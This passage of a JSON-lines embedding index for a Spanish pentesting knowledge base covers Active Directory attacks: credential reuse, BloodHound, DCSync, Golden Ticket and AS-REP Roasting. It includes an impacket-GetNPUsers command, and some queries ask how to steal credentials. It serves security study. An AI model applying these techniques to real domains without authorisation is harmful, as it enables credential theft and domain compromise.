clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "ΒΏCΓ³mo hago el mΓ©todo de pruebas masivas de credenciales usado en ofensivas?", "v": [-0.00247, 0.04419, -0.07614, -0.00846, -0.04977, 0.04016, -0.07267, -0.02162, -0.04252, -0.1258, -0.1327, 0.02793, -0.00711, 0.06141, 0.06155, -0.00771, 0.15656, -0.00042, -0.02982, -0.15509, -0.08804, -0.17492, -0.08751, -0.00705, -0.01166, 0.07356, -0.05739, -0.01205, -0.10838, -0.05314, -0.06594, 0.11281, -0.02637, -0.01817, -0.12875, 0.10334, -0.08003, -0.04595, 0.03595, 0.20753, -0.04227, -0.0104, -0.13742, -0.05147, 0.10519, -0.04576, -0.01677, 0.04345, -0.20371, -0.02401, 0.08587, -0.07498, -0.08777, -0.10322, -0.04474, -0.17011, -0.07264, -0.03725, -0.02564, -0.05902, -0.04661, -0.09504, 0.09737, 0.03768, 0.04462, -0.17845, -0.03245, -0.01393, -0.08532, 0.02119, 0.00589, 0.02574, -0.01285, 0.03421, -0.01577, -0.00205, 0.05981, 0.03051, 0.05784, -0.09722, 0.03887, -0.12298, 0.01764, -0.00519, -0.13279, -0.00296, 0.04935, -0.08719, 0.00424, -0.04593, -0.03808, -0.08316, 0.03614, 0.04123, -0.01185, -0.0431, -0.0537, -0.01487, 0.11703, -0.03712, 0.03974, 0.00472, -0.01042, 0.03307, -0.03026, -0.02223, -0.04918, 0.01022, -0.03257, -0.13307, 0.10466, 0.00462, -0.09012, 0.0784, -0.04886, 0.04018, -0.02069, -0.01914, -0.09007, -0.00665, -0.05747, 0.05996, 0.00372, 0.00053, 0.00134, -0.03577, 0.0339, -0.01426, -0.024, -9e-05, 0.04032, 0.00494, 0.00276, 0.03698, 0.02957, -0.02401, -0.00111, -0.03511, -0.07312, -0.01736, 0.0119, 0.05339, 0.06386, -0.10968, 0.00203, 0.04794, 0.01074, -0.07006, -0.06139, -0.0939, -0.00655, -0.0239, -0.05714, 0.10025, -0.06726, -0.12642, 0.12196, -0.03189, -0.04919, 0.11486, -0.03782, -0.00182, 0.03491, 0.05013, 0.01206, -0.00917, 0.01883, -0.02555, -0.0705, 0.00137, 0.08925, 0.02094, -0.08714, -0.03986, 0.08764, 0.08941, -0.00338, -0.01381, -0.05429, -0.05794, 0.05866, -0.02607, -0.08678, -0.00632, 0.08719, 0.00296, 0.04604, 0.07154, 0.09581, 0.07915, 0.0016, 0.01563, 0.03074, 0.02087, 0.02444, 0.08134, 0.02475, 0.00628, -0.01333, 0.01259, -0.07415, -0.04856, 0.03469, -0.01406, -0.00018, -0.00255, -0.04121, -0.01736, -0.02932, 0.0224, 0.02667, -0.0786, 0.11652, -0.06574, -0.11776, 0.04428, -0.12313, -0.03741, -0.0866, 0.02729, 0.02896, 0.05163, -0.02325, 0.01474, -0.03976, 0.00303, 0.00097, -0.00275, -0.01083, 0.02421, 0.00597, -0.03078, 0.0038, -0.01465, 0.02058, -0.02073, 0.02142, 0.01378, -0.00708, -0.07426, -0.0117, -0.00547, 0.02712, 0.02688, -0.04058, -0.01151, -0.04819, -0.04071, 0.04164, 0.00731, 0.01076, -0.06489, 0.02334, -0.03972, 0.04414, -0.03225]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Decidir a dΓ³nde\n- BloodHound te dice quΓ© usuario es admin dΓ³nde y el camino a Domain Admin.\n- Si llegas al DC β†’ secretsdump / DCSync β†’ Golden Ticket.\n- Red interna no enrutable β†’ Pivoting ligolo-ng.\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "que herramienta puedo usar para descubrir quΓ© usuarios tienen permisos de administrador en un dominio?", "v": [0.00272, 0.10618, -0.14341, -0.22931, -0.0132, -0.03396, -0.04041, -0.11681, -0.16253, -0.09968, -0.02156, -0.0794, 0.00833, -0.12366, 0.02023, -0.0875, 0.21079, -0.05358, 0.03103, -0.01724, 0.05379, -0.03415, -0.05857, 0.03969, -0.05586, -0.02642, 0.05768, -0.11584, -0.09952, 0.06059, 0.00747, -0.00831, 0.01369, -0.03704, -0.04861, -0.0574, -0.00198, 0.05534, 0.04785, 0.10574, 0.05883, 0.01885, -0.14012, 0.03436, -0.01598, 0.03955, -0.10708, -0.10969, -0.01098, -0.0388, -0.03231, -0.15026, -0.14781, -0.04602, 0.05681, -0.06732, 0.17943, -0.14079, 0.04349, -0.06454, -0.1282, -0.01647, -0.02246, 0.09032, -0.08977, -0.08483, 0.08112, 0.04848, -0.06173, 0.12473, -0.01179, 0.0366, 0.05428, 0.02183, 0.07374, 0.02696, -0.00167, -0.01715, 0.07716, -0.02229, 0.07855, 0.04285, -0.10268, -0.09679, -0.1389, -0.17107, -0.0136, -0.12325, 0.03154, -0.02557, 0.00658, 0.07881, -0.03294, -0.05623, -0.00104, -0.04817, 0.07551, -0.03231, -0.07662, 0.02346, 0.10711, 0.06519, -0.03747, 0.14053, 0.0089, 0.06339, 0.01805, -0.09614, -0.04249, -0.02043, 0.02614, -0.02563, -0.0567, -0.00678, -0.02739, 0.12174, -0.05735, -0.08562, -0.05304, -0.08586, 0.00036, -0.02564, 0.02988, -0.0059, 0.0871, -0.0089, 0.00274, 0.07898, -0.04529, -0.12134, 0.00724, -0.07517, -0.05621, 0.0151, -0.07754, 0.06496, -0.03444, -0.01895, -0.06062, 0.00415, -0.06267, 0.01709, -0.06214, -0.04702, 0.06598, -0.00476, -0.0232, -0.07011, -0.04246, -0.05203, 0.00404, -0.05157, -0.04628, 0.07741, -0.0107, 0.05261, -0.03629, -0.02594, -0.0742, 0.04632, -0.01708, -0.04989, -0.01325, 0.05885, 0.04125, -0.06039, 0.01213, -0.01988, 0.02508, 0.04507, -0.01373, 0.05207, 0.0532, -0.018, 0.04207, -0.04358, -0.03451, -0.02362, -0.03731, -0.03256, -0.01763, -0.04183, -0.04284, 0.01504, -0.05087, 0.00959, 0.0273, 0.0079, -0.04223, 0.08616, 0.00836, 0.10934, 0.04646, -0.03538, 0.05572, -0.02102, 0.04538, -0.02122, -0.0321, -0.04409, -0.0048, -0.01064, -0.02736, -0.02358, 0.04987, -0.06297, -0.03039, 0.01645, 0.04439, -0.01883, 0.01445, -0.03579, 0.03835, -0.02684, -0.03394, 0.0031, -0.01827, 0.03015, -0.0221, -0.08014, 0.03012, 0.03431, 0.04021, 0.00563, 0.07379, -0.00141, 0.00128, -0.02764, -0.00497, 0.0518, 0.00566, -0.00307, -0.02041, 0.00846, 0.04086, -0.05193, 0.06747, -0.02252, -0.0059, 0.02218, -0.04042, 0.06304, 0.06229, -0.00593, -0.06876, -0.05142, -0.02509, 0.01635, -0.07576, -0.0369, 0.02143, 0.0252, 0.04338, -0.02573, -0.02503, 0.01133]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Decidir a dΓ³nde\n- BloodHound te dice quΓ© usuario es admin dΓ³nde y el camino a Domain Admin.\n- Si llegas al DC β†’ secretsdump / DCSync β†’ Golden Ticket.\n- Red interna no enrutable β†’ Pivoting ligolo-ng.\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "cual programa me sirve para intentar obtener acceso al controlador de dominio y robar credenciales?", "v": [0.06642, -0.0223, -0.11821, -0.15249, 0.04752, -0.08245, 0.20646, 0.06546, -0.12377, -0.06658, -0.00628, -0.19076, 0.06944, -0.19389, 0.0653, 0.02724, 0.09584, -0.00789, -0.03644, 0.05642, 0.04676, -0.0362, 0.03773, -0.09827, 0.04126, -0.01381, -0.06506, -0.06817, -0.015, 0.04127, 0.04555, -0.0612, 0.08282, -0.02456, -0.0186, -0.06582, -0.02129, 0.03281, 0.01538, 0.18416, 0.09889, -0.01692, -0.13164, -0.02658, 0.08712, -0.02487, 0.03427, -0.04374, 0.00873, 0.019, -0.03062, -0.03382, -0.06726, -0.05703, 0.01748, -0.00792, 0.03668, -0.08201, 0.05608, -0.08166, -0.05737, -0.11898, 0.05928, 0.00151, -0.04976, -0.06445, 0.05939, 0.00749, -0.07404, 0.05778, -0.09276, 0.06094, 0.0362, 0.05403, 0.00808, -0.08298, 0.01042, 0.01684, 0.14644, -0.07085, 0.02694, -0.02474, -0.06192, 0.03523, -0.02006, -0.10067, -0.00491, -0.1485, -0.03679, 0.00411, 0.04192, 0.0495, -0.06434, -0.00721, -0.05649, -0.06462, 0.06032, 0.04249, -0.09193, -0.01384, 0.10921, 0.03638, -0.19443, 0.17497, 0.01501, 0.1465, 0.05563, -0.05456, -0.04171, -0.04528, -0.05557, -0.022, -0.08911, 0.00681, -0.06471, 0.08175, -0.05807, -0.07074, 0.02592, -0.1146, -0.0599, -0.08051, 0.00254, -0.01951, 0.08609, 0.06526, 0.03282, 0.08738, -0.03615, -0.09227, 0.01007, -0.01735, 0.06037, -0.04773, -0.01189, -0.00998, -0.02928, -0.09098, -0.08348, 0.06308, -0.03379, 0.08318, 0.00259, -0.00532, 0.01321, -0.05062, 0.03787, -0.06384, 0.02586, -0.05184, -0.08367, 0.02405, -0.05643, 0.07818, 0.02527, 0.01416, 0.01918, -0.04418, -0.05978, 0.0579, -0.04242, 0.05499, -0.05442, -0.00916, -0.01547, -0.05663, 0.02728, -0.0309, 0.0742, 0.04351, -0.01758, 0.02628, -0.00657, -0.04949, -0.03045, -0.04383, 0.02508, -0.07577, 0.00087, -0.07548, -0.05925, 0.107, 0.06629, 0.06923, -0.06186, 0.04707, -0.01141, 0.04418, -0.00615, -0.0175, 0.10192, -0.00441, -0.07389, -0.01249, 0.05624, -0.02017, 0.01168, 0.02032, -0.00646, -0.00026, -0.04321, 0.02701, -0.04065, -0.02734, 0.06697, 0.04277, 0.04783, -0.01359, 0.02386, 0.0544, 0.00977, -0.01375, 0.04622, -0.02502, -0.05627, -0.02027, -0.01884, 0.04091, -0.01262, -0.0508, -0.00417, 0.01062, 0.02458, 0.07565, 0.00856, -0.03664, -0.01208, -0.00797, -0.00844, 0.02773, -0.02446, -0.02131, -0.03479, -0.07346, 0.02866, -0.01481, 0.03248, -0.03553, 0.04219, -0.10377, -0.06902, 0.09836, -0.03132, -0.1085, -0.08317, -0.02913, -0.07568, 0.01125, -0.01549, 0.02178, 0.03984, 0.05222, -0.01122, -0.06511, 0.0152, -0.0051]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "que programa me permite robar las respuestas de autenticaciΓ³n de Active Directory sin pedir credenciales?", "v": [0.06766, 0.06108, -0.05512, -0.1387, 0.16492, -0.0144, 0.09974, 0.01818, -0.14319, 0.00608, 0.09158, -0.1632, 0.0321, -0.16375, 0.14002, 0.00663, -0.02062, 0.0967, 0.05103, 0.05167, 0.10335, -0.04562, -0.0525, -0.06929, 0.08985, 0.02687, 0.01219, -0.0034, 0.09131, 0.04756, 0.05033, -0.04557, 0.02, 0.00524, 0.00512, 0.00065, -0.03179, -0.0129, 0.01919, 0.12308, 0.00179, 0.01363, -0.05489, 0.00559, 0.11842, 0.08329, 0.0241, -0.0744, 0.02514, 0.12834, -0.07474, -0.11893, -0.06382, -0.05739, -0.03516, -0.0218, 0.0168, -0.01064, 0.05438, -0.16181, -0.03813, -0.03474, -0.00398, -0.02937, 0.07539, -0.02513, 0.20686, -0.06999, -0.00042, 0.07525, -0.08554, 0.02104, -0.01514, 0.14601, 0.00564, -0.08966, -0.02036, -0.09605, -0.04067, 0.10206, 0.03775, -0.00876, 0.08531, 0.08165, -0.00278, -0.03858, 0.07745, -0.08282, -0.03292, 0.01907, 0.05077, 0.13695, 0.00083, 0.07035, 0.01577, -0.06226, 0.06737, 0.08999, -0.01438, 0.0862, 0.01003, -0.16056, -0.10804, 0.13184, -0.06284, 0.08511, -0.02055, 0.04033, -0.07876, 0.02938, -0.06528, -0.08185, -0.03532, -0.02727, 0.03396, 0.12874, -0.07598, -0.06138, 0.00505, 0.01929, -0.07116, -0.09916, 0.061, 0.00559, 0.11796, 0.03082, -0.00675, 0.0964, -0.04628, -0.0028, 0.0188, 0.04159, 0.04604, -0.06707, 0.00613, -0.10663, 0.00155, -0.04128, 0.00232, -0.04599, -0.06244, 0.01802, 0.0415, 0.04735, -0.01042, 0.00126, -0.03645, -0.05526, -0.01277, -0.00545, -0.03745, 0.09443, 0.01506, 0.06012, 0.00722, 0.0776, 0.05931, -0.07911, -0.07994, 0.05051, -0.00607, 0.00867, -0.01851, -0.06021, -0.06592, -0.10412, -0.01808, 0.01562, 0.04969, 0.06406, 0.00475, 0.09348, 0.03211, -0.09549, 0.00011, 0.06676, 0.05837, -0.06864, 0.03458, -0.04627, -0.08034, 0.07378, 0.07089, 0.02104, -0.00636, 0.01679, 0.01197, 0.01236, -0.03756, -0.02962, 0.08502, -0.01334, -0.03088, 0.03218, 0.00199, 0.01039, 0.03739, 0.02242, 0.02581, -0.033, -0.07288, 0.03688, -0.00416, -0.05384, 0.06001, 0.06406, 0.02046, 0.05246, 0.02632, 0.02919, -0.0382, 0.02751, 0.12271, -0.02244, -0.05033, -0.00449, -0.02095, 0.0788, -0.06361, 0.02534, -0.02079, 0.00901, 0.03485, 0.06193, 0.02927, -0.01277, -0.0148, -0.00675, -0.01063, 0.00895, 0.01546, -0.05328, -0.07269, -0.06017, 0.02368, -0.00321, -0.0054, -0.0249, 0.02546, -0.09541, -0.03205, 0.08051, -0.01904, -0.03728, -0.06985, 0.07089, 0.0106, 0.03504, 0.04104, -0.0045, 0.02539, 0.03193, -0.0129, -0.04939, 0.02397, -0.00091]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "con que herramienta puedo obtener la informaciΓ³n de autenticaciΓ³n pre-authentication en un dominio?", "v": [0.06437, 0.13266, -0.09069, -0.14694, 0.11317, -0.0695, -0.03647, -0.05396, -0.2047, 0.10612, -0.06616, -0.0868, 0.00369, -0.06986, -0.01185, -0.01167, 0.15854, -0.04504, -0.02752, 0.03608, 0.07198, -0.03609, -0.08553, -0.0532, -0.028, -0.08455, 0.02067, 0.01064, -0.06351, 0.13008, 0.06472, -0.00208, 0.0053, 0.03093, -0.03156, -0.07223, -0.01989, 0.15375, 0.09995, 0.10925, 0.05043, -0.02311, -0.0167, 0.10075, 0.02398, 0.05031, -0.01208, 0.00134, 0.03526, -0.03301, -0.03703, -0.21316, -0.19793, -0.06839, -0.05123, -0.0958, 0.2183, -0.08247, 0.09238, -0.05061, -0.12636, -0.07422, -0.04402, 0.03997, -0.01404, -0.01139, 0.06311, -0.01225, -0.05053, 0.09823, 0.0414, 6e-05, 0.03804, 0.01026, 0.02797, -0.12178, 0.07375, -0.02692, 0.09753, -0.00037, 0.06763, 0.03299, -0.01875, -0.03793, -0.08932, -0.13051, -0.02637, -0.09927, 0.11199, -0.04626, 0.02131, 0.07848, -0.03807, -0.0715, 0.03766, -0.0424, 0.01025, -0.13718, -0.11035, -0.05445, 0.05079, 0.05607, -0.11009, 0.06473, 0.07722, 0.0269, -0.03693, -0.08102, -0.03677, -0.01198, -0.02959, -0.01043, -0.08789, 0.02393, 0.00229, 0.11248, -0.0591, -0.06876, 0.02931, -0.07674, -0.02485, -0.05236, -0.01481, -0.04744, -0.00395, 0.05317, -0.0639, 0.05291, -0.02277, -0.1655, 0.01448, -0.07179, -0.04707, 0.02545, -0.01387, 0.04298, 0.02587, -0.131, -0.01318, -0.02877, -0.02354, 0.00401, -0.0136, -0.06135, 0.01859, -0.02286, -0.04775, -0.10483, -0.06384, -0.0142, -0.06562, -0.01826, -0.03263, 0.08959, -0.03203, 0.03754, -0.08095, -0.01196, -0.04388, 0.05349, -0.0636, -0.04118, -0.04029, 0.01439, -0.03019, -0.05659, 0.04298, -0.00789, 0.04626, 0.02548, -0.01159, 0.05885, 0.06147, -0.04377, 0.02504, -0.00273, -0.04879, -0.02004, 0.00189, -0.07309, -0.00165, -0.08066, 0.03339, -0.04237, 0.05663, 0.04845, 0.00881, -0.0494, -0.01677, 0.06678, 0.04799, 0.02946, -0.04758, 0.02966, 0.02657, 0.02231, 0.00681, -0.01494, 0.04754, 0.02948, -0.02546, -0.01563, -0.00725, -0.00972, 0.04723, 0.05124, -0.0172, -0.08126, -0.01455, -0.01542, 0.0099, -0.0008, 0.02252, -0.1295, -0.04587, -0.01178, -0.02859, 0.00234, -0.07476, -0.03941, -0.02647, 0.02112, 0.02358, 0.04046, 0.05188, -0.01838, 0.02757, -0.02321, -0.00847, -0.00386, 0.03224, -0.01332, -0.0196, -2e-05, 0.08405, -0.02059, 0.06604, -0.01642, -0.04328, -0.0179, -0.04114, 0.04174, 0.02904, -0.02657, -0.0578, -0.01461, -0.04108, -0.00673, -0.0408, -0.07446, 0.00099, 0.00412, 0.05835, 2e-05, -0.00762, -0.03102]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "cual es una alternativa para capturar los hashes de AS-REP y crackearlos sin usar Kerberos?", "v": [-0.06931, -0.20678, -0.06997, -0.03268, 0.06781, -0.11842, 0.01424, 0.17313, -0.0584, 0.07602, -0.22658, -0.10768, -0.09411, -0.02179, 0.24741, -0.02032, -0.12251, 0.13476, 0.05699, 0.12263, -0.00913, 0.01833, -0.1317, 0.01828, 0.00649, 0.01749, -0.1001, 0.04471, -0.16173, -0.06871, -0.07036, 0.11141, 0.01131, 0.03518, -0.1242, 0.00316, -0.0197, 0.05232, 0.13328, 0.12313, 0.03758, 0.04766, -0.13851, 0.07805, -0.07825, -0.04037, -0.02085, 0.04803, -0.05563, 0.01319, 0.03629, 0.04719, -0.20307, 0.01048, -0.02023, -0.06492, 0.08984, -0.0329, -0.12989, -0.03388, -0.09844, 0.04094, -0.0369, 0.03863, 0.03432, -0.17806, -0.12355, -0.04026, -0.07778, 0.03287, 0.0383, 0.14262, 0.05197, -0.01525, 0.00404, 0.09871, -0.05147, -0.08336, 0.0794, 0.06841, 0.00422, -0.11335, 0.04175, 0.07718, -0.08061, 0.00327, 0.09161, -0.03408, -0.02848, -0.0947, -0.024, 0.04041, 0.00373, 0.05703, 0.02123, -0.10648, -0.02629, 0.08404, -0.07753, 0.00791, 0.00676, -0.11797, -0.07464, 0.039, -0.05002, -0.02712, -0.02518, 0.00852, -0.00534, 0.01359, 0.03557, 0.04889, -0.02811, 0.05712, -0.06104, -0.0255, 0.02556, -0.08592, 0.0104, -0.02101, -0.06392, 0.00761, -0.01523, -0.08642, 0.0804, 0.05961, 0.0596, 0.03699, -0.00507, -0.01515, 0.04463, -0.00585, -0.01842, 0.00052, -0.03046, -0.0429, 0.08732, -0.01557, -0.03609, -0.04608, -0.01951, 0.04921, -0.04324, -0.00686, 0.03351, 0.00625, -0.00086, 0.04139, 0.015, -0.00104, 0.04183, 0.01047, -0.04751, 0.04031, -0.03731, 0.04166, -0.00594, -0.00961, -0.05037, 0.07958, -0.03077, -0.05707, 0.02254, 0.05825, -0.00754, -0.03626, 0.03045, -0.07191, 0.00269, 0.04263, 0.05142, 0.02264, -0.00532, -0.02036, 0.05485, -0.04726, 0.02692, 0.00183, -0.03123, -0.10629, 0.00505, 0.02996, 0.04225, 0.04734, 0.00223, 0.00453, 0.05561, 0.04194, -0.07803, -0.00684, 0.02012, -0.02373, -0.01045, -0.0237, -0.0115, -0.04561, 0.07902, -0.00132, 0.01109, 0.00269, -0.02268, -0.02001, 0.00784, -0.05157, 0.06721, -0.02482, -0.02864, -0.03002, -0.00599, 0.01214, 0.00015, 0.01326, 0.05164, 0.00384, -0.02077, 0.00514, 0.02599, 0.03152, -0.03787, 0.03763, 0.03123, 0.06117, 0.04687, 0.08363, -0.02064, 0.04426, -0.00279, 0.06851, -0.05568, 7e-05, 0.01294, 0.05568, -0.01717, 0.02009, -0.04684, 0.00498, -0.04114, 0.0257, -0.03144, -0.01658, 0.03126, 0.03045, -0.03446, 0.05333, -0.0034, 0.00673, -0.07315, 0.01816, 0.01703, -0.04551, -0.00679, 0.02958, 0.00013, 0.00673, 0.01925, 0.01518]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "quΓ© herramienta me permite obtener una lista de usuarios en un dominio usando SMB?", "v": [-0.08598, 0.06872, -0.12748, -0.15878, -0.07575, -0.13023, -0.17894, -0.14395, -0.15162, -0.04374, -0.10318, -0.07805, 0.07257, -0.212, -0.04441, -0.01058, 0.11386, -0.07559, -0.04988, -0.03559, 0.04675, -0.01264, -0.09721, -0.02903, -0.06144, -0.04833, 0.04144, -0.09371, -0.07672, 0.15118, 0.04526, -0.05922, -0.01754, -0.04353, -0.04786, -0.10951, 0.02712, 0.05612, 0.06981, 0.09848, 0.07153, -0.00904, -0.14148, 0.01284, -0.03867, 0.02906, -0.07751, -0.02055, -0.00259, 0.01111, -0.01837, -0.10824, -0.19256, 0.01365, -0.02518, -0.13687, 0.17022, -0.15968, 0.00892, -0.1013, -0.14637, -0.05249, -0.02094, 0.06861, -0.05023, -0.0955, 0.0372, 0.03982, -0.06872, 0.08772, 0.03921, 0.01933, 0.08828, -0.02308, 0.0802, 0.02017, 0.07329, -0.01648, 0.02983, -0.04576, 0.03833, -0.05372, -0.0688, -0.01479, -0.0672, -0.11542, 0.01128, -0.03581, 0.0436, -0.02384, 0.02468, 0.09724, -0.0254, -0.0044, 0.00542, -0.03711, 0.05842, -0.03544, -0.00431, -0.04862, 0.16441, 0.09314, -0.12398, 0.08258, 0.05615, 0.03767, 0.00105, -0.08258, -0.09322, -0.00651, 0.03474, -0.0136, -0.02228, 0.00921, -0.03325, 0.08575, -0.02354, -0.08039, -0.04459, -0.09672, -0.03428, 0.04658, -0.02876, -0.08702, 0.03935, 0.01971, 0.00939, 0.03916, -0.08601, -0.15547, 0.01361, -0.02743, -0.05023, -0.04669, -0.03428, -0.02179, 0.02914, -0.05653, -0.02743, -0.01439, -0.03772, -0.00224, -0.11697, -0.04879, -0.02756, -0.08073, 0.04746, -0.0872, -0.05705, -0.02748, -0.02159, -0.0546, -0.05781, 0.01387, 0.01132, 0.057, -0.07336, -0.01394, -0.09888, -0.00465, -0.0469, -0.05362, 0.01545, 0.04624, 0.00347, -0.0429, 0.08947, 0.02646, 0.03909, 0.06058, 0.02643, 0.0568, 0.05615, -0.01489, 0.02745, -0.05215, 0.00191, 0.0358, -0.04763, -0.02227, -0.03544, -0.03986, 0.01446, 0.00614, -0.0065, -0.02009, 0.0164, -0.01657, -0.00384, 0.04366, -0.02006, 0.10427, 0.01774, -0.00867, 0.05373, 0.01217, 0.02117, -0.01458, 0.00622, -0.04078, -0.03835, -0.02937, -0.00461, -0.02142, 0.01852, -0.00433, 0.00072, -0.02537, 0.05576, -0.03409, 0.02074, 0.02288, 0.00344, -0.01993, 0.01971, -0.00064, -0.02881, 0.02713, 0.00702, -0.09532, -0.03604, 0.00988, 0.02427, -0.00336, -0.00618, 0.05184, -0.03436, -0.02121, -0.00945, 0.00665, 0.03411, -0.03774, -0.00902, -0.00126, 0.04587, -0.07477, -0.00744, 0.00303, -0.01345, 0.01933, -0.07915, 0.03669, 0.03259, -0.00279, -0.05977, -0.04006, -0.01024, -0.02961, -0.06317, -0.03623, -0.01471, -0.00763, 0.06658, -0.03414, -0.00868, 0.02319]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "con quΓ© programa puedo enumerar los usuarios previos o con sesiΓ³n nula a travΓ©s del protocolo SMB?", "v": [0.02447, 0.06162, -0.16562, -0.14966, 0.02712, -0.12044, 0.01031, -0.15921, -0.15755, -0.07993, -0.0705, 0.12795, 0.12794, -0.16835, -0.06476, 0.01746, 0.01035, -0.05122, 0.06909, 0.07087, -0.00165, 0.00892, -0.002, -0.0409, 0.02953, 0.00071, 0.1143, -0.04044, 0.03692, -0.08412, 0.01363, -0.05097, 0.14424, -0.15306, 0.07338, 0.01095, -0.00469, 0.05568, -0.04022, 0.10383, -0.00759, 0.05732, -0.03278, -0.01517, 0.12198, -0.12495, -0.01515, 0.03332, -0.05234, -0.14347, -0.01896, 0.00925, -0.04571, 0.02754, -0.11924, -0.05272, 0.07813, -0.1396, -0.03392, -0.06174, 0.0091, 0.01995, 0.12114, -0.01223, 0.06397, -0.08162, 0.08703, 0.03828, -0.09479, 0.06478, -0.01646, 0.03617, 0.01123, -0.10296, 0.11527, -0.02178, -0.06651, -0.03605, 0.05005, -0.01963, -0.08943, -0.07885, 0.10645, 0.04234, -0.13963, 0.08444, -0.01772, 0.04508, -0.05401, -0.03039, 0.02161, 0.09294, 0.00666, -0.05645, 0.13872, -0.07056, 0.06433, 0.05529, 0.05692, 0.11448, 0.0619, -0.02467, -0.13441, 0.18017, -0.01501, 0.06149, 0.03658, -0.08294, -0.02523, -0.00635, -0.04009, -0.00165, -0.02003, -0.05858, -0.06374, 0.05651, -0.10506, -0.05246, -0.01379, -0.02676, -0.06319, 0.0493, -0.06781, 0.03674, 0.05872, -0.01671, -0.01635, 0.15497, 0.01461, 0.04434, -0.00925, 0.05554, -0.01585, 0.006, -0.08078, -0.03508, -0.05526, -0.02309, -0.03666, -0.00643, -0.01859, 0.07857, -0.00395, 0.02519, 0.04507, -0.10856, 0.0165, -0.08884, -0.11547, 0.06525, 0.03078, 0.06788, -0.05658, 0.04108, -0.08364, 0.02106, 0.02298, -0.0609, 0.01832, 0.0073, -0.06288, 0.0034, 0.01664, -0.01818, 0.01899, -0.03049, -0.03216, -0.02459, 0.03748, 0.04422, 0.00153, 0.04136, 0.02136, -0.04884, 0.00849, 0.00516, -0.03884, -0.0359, 0.03029, -0.03641, -0.0581, -0.01413, 0.00049, -0.00132, -0.04372, -0.0504, -0.02651, 0.05282, 0.07066, 0.01813, -0.09214, 0.06607, -0.00856, 0.06116, -0.02813, -0.05372, -0.03088, 0.00285, 0.01434, 0.03071, -0.00902, 0.02882, 0.04162, -0.03823, 0.07032, 0.071, -0.03032, 0.02453, 0.01633, 0.03715, -0.00873, -0.07213, 0.04816, -0.00276, -0.01281, -0.00961, -0.00786, 0.01342, 0.04516, -0.01445, 0.0531, 0.04752, 0.04052, 0.04393, -0.0262, -0.06748, -0.01932, 0.04092, 0.03889, 0.00657, 0.03573, -0.04997, -0.02446, 0.003, 0.06961, 0.04336, -0.00916, -0.0388, -0.04061, -0.05089, -0.01993, 0.08505, -0.06282, -0.06854, 0.02177, 0.00081, -0.0857, -0.03598, -0.00146, -0.02082, -0.02334, 0.04917, 0.0856, -0.01844, 0.03247, -0.02136]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "existe alguna alternativa libre para listar usuarios de dominio mediante el comando GetNPUsers?", "v": [-0.1279, 0.10236, -0.15667, -0.09093, -0.12173, -0.05342, 0.0815, -0.06277, -0.32811, -0.05981, -0.02257, -0.13439, 0.04513, -0.09685, 0.05604, -0.10139, 0.13664, 0.00297, 0.08909, -0.12126, -0.05638, 0.03598, -0.01747, -0.08523, -0.01599, -0.02746, -0.01081, -0.15681, -0.0306, 0.03591, 0.04031, -0.02521, -0.06206, -0.06466, -0.09998, -0.02964, 0.07234, 0.05902, 0.08583, 0.18182, 0.02662, 0.07193, -0.13834, 0.0486, -0.09429, -0.05981, -0.07871, -0.04648, 0.09498, -0.02947, 0.05247, -0.00593, -0.09649, -0.00276, 0.05037, -0.02799, 0.14529, -0.09414, -0.02367, -0.03646, -0.08082, -0.0607, 0.03884, 0.07547, -0.07619, 0.04885, 0.00383, -0.03395, -0.06354, 0.10299, 0.03119, 0.01046, 0.00082, -0.00625, 0.00291, -0.02588, 0.01677, -0.02649, 0.07624, 0.02658, 0.03893, 0.04012, -0.05058, 0.02107, -0.12011, -0.15703, -0.07708, -0.1833, 0.01878, 0.0142, 0.07176, 0.05193, 0.01439, 0.06248, 0.02824, -0.03415, 